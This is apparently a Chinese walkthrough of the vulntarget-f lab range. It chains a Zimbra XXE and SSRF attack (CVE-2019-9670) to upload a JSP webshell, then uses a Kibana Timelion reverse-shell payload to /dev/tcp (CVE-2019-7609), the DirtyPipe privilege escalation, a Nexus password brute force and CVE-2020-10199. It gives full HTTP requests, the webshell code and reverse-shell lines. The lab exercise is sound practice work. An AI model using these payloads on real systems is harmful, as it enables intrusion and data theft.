机器密码: 外网centos:root/vulntarget-f 内网Ubuntu、二层内网Ubuntu:root/Vulntarget# 拓扑图:
由于外网centos这台机器找不着密码,试了好多个也都不对,于是这里我们重置一下centos的密码
重启开机,在第一行按e,进行编辑:
①.ro改为rw
②.在LANG=en_US.UFT-8后面添加init=/bin/sh
按Ctrl+X重启
进入命令行输入passwd修改密码
vi /etc/sysconfig/selinux # 关闭selinux,它这里就是disable的,所以不需要改动
exec /sbin/init # 重启系统,完成重置密码
后面打的时候发现重置完/tmp目录下的都会被清空,会导致无法获取flag,就直接恢复快照后神奇的发现又能扫到目标主机了;然后就是centos这台环境说是有点问题的要根据文档搭一遍,不过我这边恢复快照环境正常没出现问题,有问题可以根据下面文档自行搭建
扫描存活主机和端口,发现开放了22、443等端口,存在Zimbra
访问web如下:
可以利用msf中自带的进行攻击
msf上线后反弹shell
python -c 'import pty; pty.spawn("/bin/bash")'
在root目录下发现flag,但是权限不够无法cat flag,所以需要提权,先信息收集一下
Linux内核提权都试了下并没成功,后面看了下是在/tmp/login_data/root
下找到root密码:vulntarget-f
得到flag:vulntarget-f{------dsjlkfj489rjgr----}
前面就是为了测试一下外网centos是否正常直接利用msf现成的,为了减少对msf的依赖,后面再来手工打一下看看,可以通过xxe与ssrf完成上传webshell
Zimbra的配置文件在
/conf/localconfig.xml
,里面有保存到一些配置信息的用户名和密码
首先验证是否有CVE-2019-9670 XXE漏洞,修改为POST,url改为/Autodiscover/Autodiscover.xml
,再修改一下Content-Type: application/xml
,这里我们可以成功读到/etc/passwd,说明存在该漏洞
poc如下:
POST /Autodiscover/Autodiscover.xml/ HTTP/1.1
Host: 192.168.150.141:7071
Cookie: ZA_SKIN=serenity; ZA_TEST=true; ZM_TEST=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Content-Type: application/xml
Te: trailers
Connection: close
Content-Length: 346
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
然后我们开始构造payload来读取Zimbra的配置文件,其中xml文件需要加上CDATA标签才能作为文本读取,并且xxe不能内部实体进行拼接,所以我们通过kali起个web服务来构造外部dtd,再用前面的那个包请求xml得到密码:XbVaoX3Y
poc.dtd
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
poc如下:
POST /Autodiscover/Autodiscover.xml/ HTTP/1.1
Host: 192.168.150.141:7071
Cookie: ZA_SKIN=serenity; ZA_TEST=true; ZM_TEST=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Content-Type: application/xml
Te: trailers
Connection: close
Content-Length: 404
<!DOCTYPE Autodiscover [
<!ENTITY % dtd SYSTEM "http://192.168.150.128/poc.dtd">
%dtd;
%all;
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
</Request>
</Autodiscover>
接着利用已经得到的密码获取低权限的token,低权限的token可以通过soap接口发送AuthRequest进行获取,url改为/service/soap
或/service/admin/soap
,可以返回一个低权限的token
poc如下:
POST /service/admin/soap HTTP/1.1
Host: 192.168.150.141:7071
Cookie: ZA_SKIN=serenity; ZA_TEST=true; ZM_TEST=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Content-Type: application/xml
Te: trailers
Connection: close
Content-Length: 463
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
<context xmlns="urn:zimbra">
<userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
</context>
</soap:Header>
<soap:Body>
<AuthRequest xmlns="urn:zimbraAccount">
<account by="adminName">zimbra</account>
<password>XbVaoX3Y</password>
</AuthRequest>
</soap:Body>
</soap:Envelope>
# ZM_AUTH_TOKEN=0_2d4b50e77e5ae4298afd620f5d90d68e61dc8bcf_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313637303637343037373736323b747970653d363a7a696d6272613b7469643d31303a313836303539373536383b;
再通过ssrf漏洞获取proxy接口,访问soap接口来获取到高权限的token
访问/service/proxy?target=https://127.0.0.1:8443/service/admin/soap
,对其进行抓包,修改为POST,cookie改为得到的低权限token(等级替换为ZM_ADMIN_AUTH_TOKEN),xmlns改为urn:zimbraAdmin
poc如下:
POST /service/admin/soap/ HTTP/1.1
Host: 192.168.150.141:7071
Cookie: ZM_ADMIN_AUTH_TOKEN=0_2d4b50e77e5ae4298afd620f5d90d68e61dc8bcf_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313637303637343037373736323b747970653d363a7a696d6272613b7469643d31303a313836303539373536383b;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Content-Type: application/xml
Te: trailers
Connection: close
Content-Length: 461
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
<context xmlns="urn:zimbra">
<userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
</context>
</soap:Header>
<soap:Body>
<AuthRequest xmlns="urn:zimbraAdmin">
<account by="adminName">zimbra</account>
<password>XbVaoX3Y</password>
</AuthRequest>
</soap:Body>
</soap:Envelope>
# ZM_ADMIN_AUTH_TOKEN=0_e78154820c9cf010bff124807fd2a5d976753ba1_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313637303534353633313531323b61646d696e3d313a313b747970653d363a7a696d6272613b7469643d393a3239333533313533393b;
最后利用高权限的token上传文件从而getshell,这里我们使用python脚本上传webshell,shell路径为/downloads/shell.jsp
(访问shell的时候得加上ADMIN_AUTH_TOKEN
import requests
file= {
'filename1':(None,"whocare",None),
'clientFile':("shell.jsp",r'<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>',"text/plain"),
'requestId':(None,"12",None),
} #这里我上传的是一个冰蝎的马
headers ={
"Cookie":"ZM_ADMIN_AUTH_TOKEN=0_e78154820c9cf010bff124807fd2a5d976753ba1_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313637303534353633313531323b61646d696e3d313a313b747970653d363a7a696d6272613b7469643d393a3239333533313533393b", #修改成上面获取到的的admin_token
"Host":"foo:7071"
}
r=requests.post("https://192.168.150.141:7071/service/extension/clientUploader/upload",files=file,headers=headers,verify=False) #ip也需要修改
print(r.text)
上传成功后通过冰蝎连接,添加cookie请求头,shell路径如下
https://192.168.150.141:7071/downloads/shell.jsp
# 密码:rebeyond
然后和前面的操作就一样了
利用frp建立代理
./frps -c ./frps.ini
./frpc -c ./frpc.ini &
上传fscan扫一下内网,发现存在主机192.168.20.129,开放了22、5601、9200、9300端口
访问如下,可以得知是kibana
搜索一下相关漏洞,发现有个CVE-2019-7609 Kibana远程代码执行漏洞
POC
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/You_VPS/You_VPS_Port 0>&1\'");//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/You_VPS/You_VPS_Port 0>&1");process.exit()//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
漏洞复现
在导航栏中点击Timelion,在文本框中输入如下反弹shell的poc并运行
# exec括号后面的内容为代码执行
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/192.168.20.128/8888 0>&1\'");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
然后点击左侧导航栏的Canvas,成功接收到shell
或者直接拿exp打(没打成功,这里靶场环境存在一些问题
python2 CVE-2019-7609-kibana-rce.py -u 192.168.20.129:5601 -host 192.168.20.128 -port 8888 --shell
然后nc监听8888端口成功连上,进行信息收集一波发现192.168.30.128的网卡
接着尝试Ubuntu内核提权等,最后利用CVE-2022-0847在本地编译再上传运行从而成功提权
首先本地编译好并开启web服务
./compile.sh
python -m http.server 80
再去centos中下载并开启web服务
wget http://192.168.150.128/exploit
python -m SimpleHTTPServer 80
再来到ubuntu中下载编译好的exp时发现一直没反应,后面会提示是没有权限下载,所以再去tmp目录下进行下载即可成功下载
cd tmp
wget http://192.168.20.128/exploit
执行exp提权,发现报错说我编译的版本太高了
chmod +x exploit
./exploit
后面换了个较低版本的Ubuntu18.4的进行编译成功提权,并找到flag:vulntarget{admin/top1000.txt}
还有个集成好的提权工具traitor可以利用(但是这里我没利用成功
再上传fscan扫一下内网,发现还有个192.168.30.129的网卡开放了22、8081端口
接着上传frp建立代理
chmod 777 frpc # 如果用+x这里不知道为啥还是会显示没权限
nohup ./frpc -c ./frpc.ini &
访问8081端口如下,可以得知是Nexus 3.21.0-05
搜索其漏洞可以发现可能存在CVE-2020-10199远程代码执行漏洞,但是需要先知道账号密码,弱口令尝试了一下都不行,回头看前面我们得到的flag的内容,可以猜测到这里的账号就是admin,而密码则是top1000中的一个,于是通过burp爆破密码,抓包可以看出这里账号密码是加密的,并且不难看出是base64
于是这里payload设置为base64,并添加top1000字典
爆破出来后base64解出密码:abcdef
登录后抓包获取登录后的cookie及csrf属性
但是后面这里执行命令却不行了
但是它影响版本:Nexus Repository Manager OSS/Pro 3.x <= 3.21.1,再尝试直接利用exp打一下成功了,并找到flag:vulntarget-f{(^_^ this__is__flag ^_^}